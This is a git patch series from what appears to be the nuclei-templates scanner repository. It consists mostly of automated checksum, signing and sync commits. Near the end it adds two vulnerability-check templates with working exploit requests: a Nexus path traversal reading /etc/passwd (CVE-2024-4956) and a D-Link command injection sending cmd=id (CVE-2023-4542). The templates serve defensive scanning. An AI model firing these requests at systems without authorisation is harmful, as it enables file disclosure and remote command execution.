+http/misconfiguration/installer/wiki-js-installer.yaml:21c556bd08a12c651f419ccc23b69d2980c55a1c http/misconfiguration/installer/wowcms-installer.yaml:6df79c7601fd21994a52333494a91a3d653f0573 http/misconfiguration/installer/wp-install.yaml:f09020cd3e1b61762935c650fe0ba42d659657e9 http/misconfiguration/installer/xbackbone-installer.yaml:f5578c7d92a21b929a48e7a9569f6e00db6466b7 @@ -6706,7 +6706,7 @@ http/technologies/dell/dell-idrac7-detect.yaml:60e624f4f081e596c1ae1292ea18f99d7 http/technologies/dell/dell-idrac8-detect.yaml:1dff3a1be021d38ea8846d6151c920edbf995f3e http/technologies/dell/dell-idrac9-detect.yaml:44da5eecdb4a220ccde1aecdd8c801986a988367 http/technologies/detect-sentry.yaml:f4f51185253e23a6e3db1f4bbcb1a37bebf4da1a -http/technologies/devexpress-detect.yaml:62dc0662669d161ebe6dd65e01b544f9a393965a +http/technologies/devexpress-detect.yaml:3bca8b430a118b8374432eb1f048e762b9857f5d http/technologies/directus-detect.yaml:cfea1a80217c3f05df1da02ecd2cf60e988699d5 http/technologies/dreambox-detect.yaml:35362632d9ed50a1e5b4513bfc5a09543c63e431 http/technologies/drupal-detect.yaml:5c269fdf58cf085a8ac062b1f23cd8b3a0ef7f99 @@ -8548,7 +8548,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:016be23b5b120533f2a850741c18f734f970a9e3 +templates-checksum.txt:3093b836c29f2c55f68a85dc6b71f473620aa1ab wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 0dd846201cc5bedffe77a401beae2634b59f7d41 Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Thu, 23 May 2024 05:45:52 +0000 Subject: [PATCH 123/847] Auto Generated New Template Addition List [Thu May 23 05:45:52 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 11f2eb1607..eac070ce4a 100644 --- a/.new-additions +++ b/.new-additions @@ -18,6 +18,7 @@ http/exposed-panels/easyvista-panel.yaml http/exposed-panels/fortinet/f5-next-central-manager.yaml http/exposed-panels/ghost-panel.yaml http/exposed-panels/matomo-panel.yaml +http/exposed-panels/microfocus-lifecycle-panel.yaml http/exposed-panels/n8n-panel.yaml http/exposed-panels/nocodb-panel.yaml http/exposed-panels/oracle-ebusiness-panel.yaml From 944ef8155a9b26026b695a05a875b43c4fd55d74 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Thu, 23 May 2024 05:45:56 +0000 Subject: [PATCH 124/847] Auto Generated Templates Checksum [Thu May 23 05:45:56 UTC 2024] :robot: --- templates-checksum.txt | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index ec787714fd..33b7438ea5 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -4055,6 +4055,7 @@ http/exposed-panels/metersphere-login.yaml:2a3e8e8fbd941752330c0c3b4330cd4b0ff2a http/exposed-panels/mfiles-web-detect.yaml:68378a6fd15f922fb744e6ee1dc06dbd49fd543b http/exposed-panels/microfocus-admin-server.yaml:0d58160dd2bffa2151ef010cecbace10a6f446c7 http/exposed-panels/microfocus-filr-panel.yaml:ca84f4e319c1d7abad31589ff6634365744a3242 +http/exposed-panels/microfocus-lifecycle-panel.yaml:c4e0d2706ee4069290ed8045bfceff9590c82917 http/exposed-panels/microfocus-vibe-panel.yaml:6fdb456f12d78a603126580d7c77987ca475f24c http/exposed-panels/microsoft-exchange-panel.yaml:11adf54da092d2e63804541767f06224a830c4a4 http/exposed-panels/mikrotik/mikrotik-routeros-old.yaml:305a045131b9ca81c700a79e0af7eea801440d69 @@ -8548,7 +8549,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:3093b836c29f2c55f68a85dc6b71f473620aa1ab +templates-checksum.txt:155955176e17b838064b0dd25fb5d1ed2c2ecbc1 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 8c7f3e064fc285ce039eed05c049180c3de839ff Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Thu, 23 May 2024 05:46:31 +0000 Subject: [PATCH 125/847] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 1a7529e1a2..a1efcdf014 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -23,6 +23,7 @@ on: - 'http/exposed-panels/fortinet/f5-next-central-manager.yaml' - 'http/exposed-panels/ghost-panel.yaml' - 'http/exposed-panels/matomo-panel.yaml' + - 'http/exposed-panels/microfocus-lifecycle-panel.yaml' - 'http/exposed-panels/n8n-panel.yaml' - 'http/exposed-panels/nocodb-panel.yaml' - 'http/exposed-panels/oracle-ebusiness-panel.yaml' From 32757e80bcd99de47a053d21648b27c2a7590c59 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Thu, 23 May 2024 05:46:50 +0000 Subject: [PATCH 126/847] Auto Template Signing [Thu May 23 05:46:50 UTC 2024] :robot: --- http/exposed-panels/microfocus-vibe-panel.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/http/exposed-panels/microfocus-vibe-panel.yaml b/http/exposed-panels/microfocus-vibe-panel.yaml index 712bf493f2..fe281b5dbc 100644 --- a/http/exposed-panels/microfocus-vibe-panel.yaml +++ b/http/exposed-panels/microfocus-vibe-panel.yaml @@ -43,4 +43,5 @@ http: part: body group: 1 regex: - - '(?i)Copyright\s+([0-9-]+)\s+Micro\s+Focus' \ No newline at end of file + - '(?i)Copyright\s+([0-9-]+)\s+Micro\s+Focus' +# digest: 4a0a00473045022100f02b5a7248ba65a3f82f4154f6b10af010264386f1a51a80405e9fc0140dde0502206a992f6203e0788927739e360ce495a8382839cc087edea73c633118e492ba52:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From a3eb7d491fd5554488cd0066863a95349951efaa Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Thu, 23 May 2024 05:46:52 +0000 Subject: [PATCH 127/847] Auto Generated New Template Addition List [Thu May 23 05:46:52 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index eac070ce4a..1a869da1e6 100644 --- a/.new-additions +++ b/.new-additions @@ -45,6 +45,7 @@ http/technologies/boa-web-server.yaml http/technologies/craftercms-detect.yaml http/technologies/imgproxy-detect.yaml http/technologies/meilisearch-detect.yaml +http/technologies/microfocus-iprint-detect.yaml http/technologies/statamic-detect.yaml http/technologies/tinyproxy-detect.yaml http/technologies/uni-gui-framework.yaml From 42205cd5c25b7b10f3c7340e91a63641c9a57799 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Thu, 23 May 2024 05:46:58 +0000 Subject: [PATCH 128/847] Auto Generated Templates Checksum [Thu May 23 05:46:58 UTC 2024] :robot: --- templates-checksum.txt | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 33b7438ea5..3f5e36933f 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -6831,6 +6831,7 @@ http/technologies/matrix-detect.yaml:33b6e2aef92cf34e8fdfa015ed1d7c4cbb0c9ca7 http/technologies/matrix-homeserver-detect.yaml:03f44055b1385667e1d860c9160c9b0a3b5b24b0 http/technologies/meilisearch-detect.yaml:a6496077c0c1e7d4dea5346d51d2f0863e8c0fa7 http/technologies/metatag-cms.yaml:dddeec9fe5817ce89ce12c7fb09e5702c6cf5ea7 +http/technologies/microfocus-iprint-detect.yaml:f4da103b97937df82192da15635df1182c970505 http/technologies/microsoft/aspnet-version-detect.yaml:e37201ff3f26965873974a21c6bd351a7cbe851c http/technologies/microsoft/aspnetmvc-version-disclosure.yaml:8f445b5529fb0bb219994e249b2cc3aa4e868f97 http/technologies/microsoft/default-iis7-page.yaml:c4e22ee6e9c969c526ea2609a510a8e23150963d @@ -8549,7 +8550,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:155955176e17b838064b0dd25fb5d1ed2c2ecbc1 +templates-checksum.txt:53bdb963d778b9373498578ab71409606d1a4555 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From f3340c22f90afe7ebbb81606f84bc4546acf0b3c Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Thu, 23 May 2024 05:47:33 +0000 Subject: [PATCH 130/847] Auto Generated Templates Checksum [Thu May 23 05:47:33 UTC 2024] :robot: --- templates-checksum.txt | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 3f5e36933f..538c94a7e6 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -4056,7 +4056,7 @@ http/exposed-panels/mfiles-web-detect.yaml:68378a6fd15f922fb744e6ee1dc06dbd49fd5 http/exposed-panels/microfocus-admin-server.yaml:0d58160dd2bffa2151ef010cecbace10a6f446c7 http/exposed-panels/microfocus-filr-panel.yaml:ca84f4e319c1d7abad31589ff6634365744a3242 http/exposed-panels/microfocus-lifecycle-panel.yaml:c4e0d2706ee4069290ed8045bfceff9590c82917 -http/exposed-panels/microfocus-vibe-panel.yaml:6fdb456f12d78a603126580d7c77987ca475f24c +http/exposed-panels/microfocus-vibe-panel.yaml:5405bdcbb28cf44943d03d51c8ce86ec8ba52055 http/exposed-panels/microsoft-exchange-panel.yaml:11adf54da092d2e63804541767f06224a830c4a4 http/exposed-panels/mikrotik/mikrotik-routeros-old.yaml:305a045131b9ca81c700a79e0af7eea801440d69 http/exposed-panels/mikrotik/mikrotik-routeros.yaml:dd9cf9ecc0ab355d2c3cdc748f77443cd796f24d @@ -4878,7 +4878,7 @@ http/exposures/logs/darkstat-detect.yaml:27249feadc758fe3a1febc93221581a4cd949f3 http/exposures/logs/development-logs.yaml:7ac242fe7f0381b896abdb10d387c98e93b3dc97 http/exposures/logs/django-debug-exposure.yaml:abd2a8bf74edb70e893b6cc3ad872f30072a32b5 http/exposures/logs/dozzle-container-logs.yaml:06ff374b87484f1f2020b179c702d0699b18a420 -http/exposures/logs/elmah-log-file.yaml:f36a5a5a0362cb042477717ced54a714cdf51ba6 +http/exposures/logs/elmah-log-file.yaml:031fff182953ca9b4f82344c7d2d1b563695ccf6 http/exposures/logs/error-logs.yaml:cef1a514b4c2862367f9f7512120ca223ad31d51 http/exposures/logs/event-debug-server-status.yaml:87345798d5bc327bbef0b0dbc13d5aff09eb65e2 http/exposures/logs/exposed-glances-api.yaml:687cfc585e23fb4f129877f77d06f7b92fadec63 @@ -8550,7 +8550,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:53bdb963d778b9373498578ab71409606d1a4555 +templates-checksum.txt:ce16b42e7284a90fdf52d4386a023b68ca8133b2 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From e668a7240f000b74d4276b1ff13df3959e29c1cf Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Thu, 23 May 2024 05:47:39 +0000 Subject: [PATCH 131/847] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index a1efcdf014..6f90b67d54 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -50,6 +50,7 @@ on: - 'http/technologies/craftercms-detect.yaml' - 'http/technologies/imgproxy-detect.yaml' - 'http/technologies/meilisearch-detect.yaml' + - 'http/technologies/microfocus-iprint-detect.yaml' - 'http/technologies/statamic-detect.yaml' - 'http/technologies/tinyproxy-detect.yaml' - 'http/technologies/uni-gui-framework.yaml' From 55726e83c581645c4794b2b542158d499e1d730a Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Thu, 23 May 2024 05:48:02 +0000 Subject: [PATCH 132/847] Auto Generated New Template Addition List [Thu May 23 05:48:02 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 1a869da1e6..231cf768e5 100644 --- a/.new-additions +++ b/.new-additions @@ -30,6 +30,7 @@ http/honeypot/tpot-honeypot-detect.yaml http/misconfiguration/imgproxy-unauth.yaml http/misconfiguration/installer/custom-xoops-installer.yaml http/misconfiguration/installer/easy-viserlabs-installer.yaml +http/misconfiguration/installer/forgejo-installer.yaml http/misconfiguration/installer/froxlor-installer.yaml http/misconfiguration/installer/ids-skills-installer.yaml http/misconfiguration/installer/moosocial-installer.yaml From b2fe9c76e3b2ce19e736f9b8757df5056f4b4911 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Thu, 23 May 2024 05:48:06 +0000 Subject: [PATCH 133/847] Auto Generated Templates Checksum [Thu May 23 05:48:06 UTC 2024] :robot: --- templates-checksum.txt | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 538c94a7e6..2f20e5ac34 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -5408,6 +5408,7 @@ http/misconfiguration/installer/espeasy-installer.yaml:051a8d1869f34a42c6d6a287f http/misconfiguration/installer/espocrm-installer.yaml:fccc8f34a7a3101fe1171472726b160881408b3a http/misconfiguration/installer/eyoucms-installer.yaml:a39da2ac7d242b481b6cebd70a0b4b89317a903b http/misconfiguration/installer/facturascripts-installer.yaml:cba5490847e989a892fef13fdcd1ae9f2c01dbea +http/misconfiguration/installer/forgejo-installer.yaml:7bb822ad620aba636554fd7151554a76b8bfa48a http/misconfiguration/installer/froxlor-installer.yaml:4e750156a862eba74eb7edf2efa7b91fb7b273dc http/misconfiguration/installer/geniusocean-installer.yaml:d18cbff0dd385dbab1c44876c8ac2587116fef1a http/misconfiguration/installer/getsimple-installation.yaml:5673a1203b9080ff329c3fe251cb799e41d0432e @@ -8550,7 +8551,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:ce16b42e7284a90fdf52d4386a023b68ca8133b2 +templates-checksum.txt:83af1dc90702df15b465bfb26d269eb6821879d1 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 0426114891c6fe4fa866ebd6cb5863829abaeee3 Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Thu, 23 May 2024 05:48:51 +0000 Subject: [PATCH 134/847] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 6f90b67d54..542807e327 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -35,6 +35,7 @@ on: - 'http/misconfiguration/imgproxy-unauth.yaml' - 'http/misconfiguration/installer/custom-xoops-installer.yaml' - 'http/misconfiguration/installer/easy-viserlabs-installer.yaml' + - 'http/misconfiguration/installer/forgejo-installer.yaml' - 'http/misconfiguration/installer/froxlor-installer.yaml' - 'http/misconfiguration/installer/ids-skills-installer.yaml' - 'http/misconfiguration/installer/moosocial-installer.yaml' From fec8faad67776816e3176eec6f6a023da3f516ab Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Thu, 23 May 2024 05:49:01 +0000 Subject: [PATCH 136/847] Auto Generated Templates Checksum [Thu May 23 05:49:01 UTC 2024] :robot: --- templates-checksum.txt | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 2f20e5ac34..0bdc50aa97 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -6529,7 +6529,7 @@ http/takeovers/canny-takeover.yaml:cc5a760aa65559322a94344f7add91e523a63db1 http/takeovers/cargo-takeover.yaml:42db7ee4771a5cbddc6e2b8072070c583d6fd452 http/takeovers/cargocollective-takeover.yaml:dde78512f960c62936577c19801b1446ec65d5d3 http/takeovers/clever-takeover.yaml:f4d45f5b42f376d3258d2b4140a9dad14e25cd87 -http/takeovers/flexbe-takeover.yaml:beb769a298f11ffc28a49fbdc3f9e15c4d22a181 +http/takeovers/flexbe-takeover.yaml:bd450946fb6237dbf99f21409082be3ebb6d295b http/takeovers/frontify-takeover.yaml:e7700c7ad9bb5a761d8bd1395c6a5360c91b3dcb http/takeovers/gemfury-takeover.yaml:69d22f9c935be01d0ebad5946a9766eafe12fc68 http/takeovers/getresponse-takeover.yaml:5eff48c5b7d27eeede3d2e7fba1a8a6f314fa9bd @@ -8551,7 +8551,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:83af1dc90702df15b465bfb26d269eb6821879d1 +templates-checksum.txt:9a3f5794cd87bbf6dd7263091a7856123bed136c wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From c536c55df885aebf46a5a1f2f809d91c0eb490e6 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Thu, 23 May 2024 05:49:19 +0000 Subject: [PATCH 137/847] Auto Template Signing [Thu May 23 05:49:19 UTC 2024] :robot: --- http/exposed-panels/microfocus-lifecycle-panel.yaml | 1 + http/exposures/logs/elmah-log-file.yaml | 3 +-- http/technologies/microfocus-iprint-detect.yaml | 1 + 3 files changed, 3 insertions(+), 2 deletions(-) diff --git a/http/exposed-panels/microfocus-lifecycle-panel.yaml b/http/exposed-panels/microfocus-lifecycle-panel.yaml index 8b67bcf5bf..3ac49b36dd 100644 --- a/http/exposed-panels/microfocus-lifecycle-panel.yaml +++ b/http/exposed-panels/microfocus-lifecycle-panel.yaml @@ -35,3 +35,4 @@ http: group: 1 regex: - '(?i)Micro\s+Focus\s+Application\s+Lifecycle\s+Management\s+([0-9.]+)' +# digest: 490a004630440220758324cb4cece38090221807411012b6414e7a7729f640252d7b6a10d86b4c0602202f1bbeb2e1678a36e27b99fd4fd3e9a355d303f66ac8b76e11278764fb694520:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposures/logs/elmah-log-file.yaml b/http/exposures/logs/elmah-log-file.yaml index e917652778..643e13220e 100644 --- a/http/exposures/logs/elmah-log-file.yaml +++ b/http/exposures/logs/elmah-log-file.yaml @@ -33,5 +33,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022041713d43c8599e2c01d09ef6c0cc98279b9480702f417395ce30e008679c2f890221008ca2a38749c9eeeb1c8a9ad56ae4a3425e0fc15e26b343eae714e798e222dd5e:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a004830460221008a7f805258e2f9a89c6299ec951b56b46def018df7f37c2d78c43e58b5a95073022100f8859a41f2bae3ab249c313d586d1b11214f0d82728cd94b0ae57e967caa034d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/microfocus-iprint-detect.yaml b/http/technologies/microfocus-iprint-detect.yaml index 2ace39fa15..bde012dc46 100644 --- a/http/technologies/microfocus-iprint-detect.yaml +++ b/http/technologies/microfocus-iprint-detect.yaml @@ -32,3 +32,4 @@ http: group: 1 regex: - '(?i)/welcome/css/core([0-9]+).css' +# digest: 4b0a00483046022100921c5db244930261b6ff309507cc3c59d04a95b5c6bd4ee6dbf7a976efc056f9022100c763c232c6e0063fa9870f97ae6d91ffeef60da3cead4fe2e61cd8acc9d5a59a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 18b288415cc0e116feb17500457f8cf8c9eddba1 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Thu, 23 May 2024 11:54:19 +0530 Subject: [PATCH 138/847] Create CVE-2024-4956.yaml --- http/cves/2024/CVE-2024-4956.yaml | 28 ++++++++++++++++++++++++++++ 1 file changed, 28 insertions(+) create mode 100644 http/cves/2024/CVE-2024-4956.yaml diff --git a/http/cves/2024/CVE-2024-4956.yaml b/http/cves/2024/CVE-2024-4956.yaml new file mode 100644 index 0000000000..61890e2fc4 --- /dev/null +++ b/http/cves/2024/CVE-2024-4956.yaml @@ -0,0 +1,28 @@ +id: CVE-2024-4956 + +info: + name: Nexus Repository Manager - Local File Inclusion + author: ritikchaddha + severity: high + description: | + Path Traversal in Sonatype Nexus Repository 3 allows an unauthenticated attacker to read system files. Fixed in version 3.68.1. + metadata: + verified: true + max-request: 1 + fofa-query: title="Nexus Repository Manager" + tags: cve,cve2024,nexus,lfi + +http: + - method: GET + path: + - "{{BaseURL}}/%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd" + + matchers-condition: and + matchers: + - type: regex + regex: + - "root:.*:0:0:" + + - type: status + status: + - 200 From dae34a982cf5ac54bff8e22d522fa0d374eb7e1c Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Thu, 23 May 2024 12:00:22 +0530 Subject: [PATCH 139/847] updated matcher & info --- http/cves/2024/CVE-2024-4956.yaml | 27 ++++++++++++++++++--------- 1 file changed, 18 insertions(+), 9 deletions(-) diff --git a/http/cves/2024/CVE-2024-4956.yaml b/http/cves/2024/CVE-2024-4956.yaml index 61890e2fc4..a033fb849a 100644 --- a/http/cves/2024/CVE-2024-4956.yaml +++ b/http/cves/2024/CVE-2024-4956.yaml @@ -1,14 +1,25 @@ id: CVE-2024-4956 info: - name: Nexus Repository Manager - Local File Inclusion + name: Sonatype Nexus Repository Manager 3 - Local File Inclusion author: ritikchaddha severity: high description: | Path Traversal in Sonatype Nexus Repository 3 allows an unauthenticated attacker to read system files. Fixed in version 3.68.1. + reference: + - https://x.com/phithon_xg/status/1793517567560335428?s=46&t=GMMfJwV8rhJHdcj2TUympg + - https://nvd.nist.gov/vuln/detail/CVE-2024-4956 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2024-4956 + cwe-id: CWE-22 + cpe: cpe:2.3:a:sonatype:nexus:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 + vendor: sonatype + product: nexus fofa-query: title="Nexus Repository Manager" tags: cve,cve2024,nexus,lfi @@ -17,12 +28,10 @@ http: path: - "{{BaseURL}}/%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd" - matchers-condition: and matchers: - - type: regex - regex: - - "root:.*:0:0:" - - - type: status - status: - - 200 + - type: dsl + dsl: + - regex('root:.*:0:0:', body) + - contains(header, "application/octet-stream") + - status_code == 200 + condition: and From 4144228bb89b0748953efb6e8e12bf9ef456b0c2 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Thu, 23 May 2024 12:03:58 +0530 Subject: [PATCH 140/847] Create CVE-2023-4542.yaml --- http/cves/2023/CVE-2023-4542.yaml | 47 +++++++++++++++++++++++++++++++ 1 file changed, 47 insertions(+) create mode 100644 http/cves/2023/CVE-2023-4542.yaml diff --git a/http/cves/2023/CVE-2023-4542.yaml b/http/cves/2023/CVE-2023-4542.yaml new file mode 100644 index 0000000000..ebbab4d363 --- /dev/null +++ b/http/cves/2023/CVE-2023-4542.yaml @@ -0,0 +1,47 @@ +id: CVE-2023-4542 + +info: + name: D-Link DAR-8000-10 - Command Injection + author: pussycat0x + severity: critical + description: | + D-Link DAR-8000-10 version has an operating system command injection vulnerability. The vulnerability originates from the parameter id of the file /app/sys1.php which can lead to operating system command injection. + reference: + - https://github.com/20142995/sectool + - https://github.com/tanjiti/sec_profile + - https://github.com/wy876/POC/blob/main/D-Link_DAR-8000%E6%93%8D%E4%BD%9C%E7%B3%BB%E7%BB%9F%E5%91%BD%E4%BB%A4%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E(CVE-2023-4542).md + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2023-4542 + cwe-id: CWE-78 + epss-score: 0.00067 + epss-percentile: 0.29155 + cpe: cpe:2.3:o:dlink:dar-8000-10_firmware:*:*:*:*:*:*:*:* + metadata: + vendor: dlink + product: dar-8000-10_firmware + fofa-query: body="DAR-8000-10" && title="D-Link" + tags: cve,cve2023 + +http: + - raw: + - | + POST /app/sys1.php HTTP/1.1 + Host: {{Hostname}} + Accept-Encoding: gzip, deflate + Content-Type: application/x-www-form-urlencoded + + cmd=id + + matchers-condition: and + matchers: + - type: regex + part: body + regex: + - "uid=([0-9(a-z)]+) gid=([0-9(a-z)]+)" + condition: and + + - type: status + status: + - 200 From 426fd4de9b2bbddd72ff6d69d82e6348c5737875 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Thu, 23 May 2024 12:50:58 +0530 Subject: [PATCH 141/847] Update CVE-2023-4542.yaml --- http/cves/2023/CVE-2023-4542.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/cves/2023/CVE-2023-4542.yaml b/http/cves/2023/CVE-2023-4542.yaml index ebbab4d363..fa8f8bb012 100644 --- a/http/cves/2023/CVE-2023-4542.yaml +++ b/http/cves/2023/CVE-2023-4542.yaml @@ -22,7 +22,7 @@ info: vendor: dlink product: dar-8000-10_firmware fofa-query: body="DAR-8000-10" && title="D-Link" - tags: cve,cve2023 + tags: cve,cve2023,dlink http: - raw: From 41fedfe1b9001410da1c70c6d2996e509b4f0b8d Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Thu, 23 May 2024 14:17:36 +0530 Subject: [PATCH 142/847] minor update --- http/cves/2023/CVE-2023-4542.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/http/cves/2023/CVE-2023-4542.yaml b/http/cves/2023/CVE-2023-4542.yaml index fa8f8bb012..b1043fadab 100644 --- a/http/cves/2023/CVE-2023-4542.yaml +++ b/http/cves/2023/CVE-2023-4542.yaml @@ -22,6 +22,8 @@ info: vendor: dlink product: dar-8000-10_firmware fofa-query: body="DAR-8000-10" && title="D-Link" + verified: true + max-request: 1 tags: cve,cve2023,dlink http: @@ -40,7 +42,6 @@ http: part: body regex: - "uid=([0-9(a-z)]+) gid=([0-9(a-z)]+)" - condition: and - type: status status: From 5249ce12ef52c3d5c079b1cc2351726f91f12187 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Thu, 23 May 2024 14:21:23 +0530 Subject: [PATCH 143/847] minor update --- 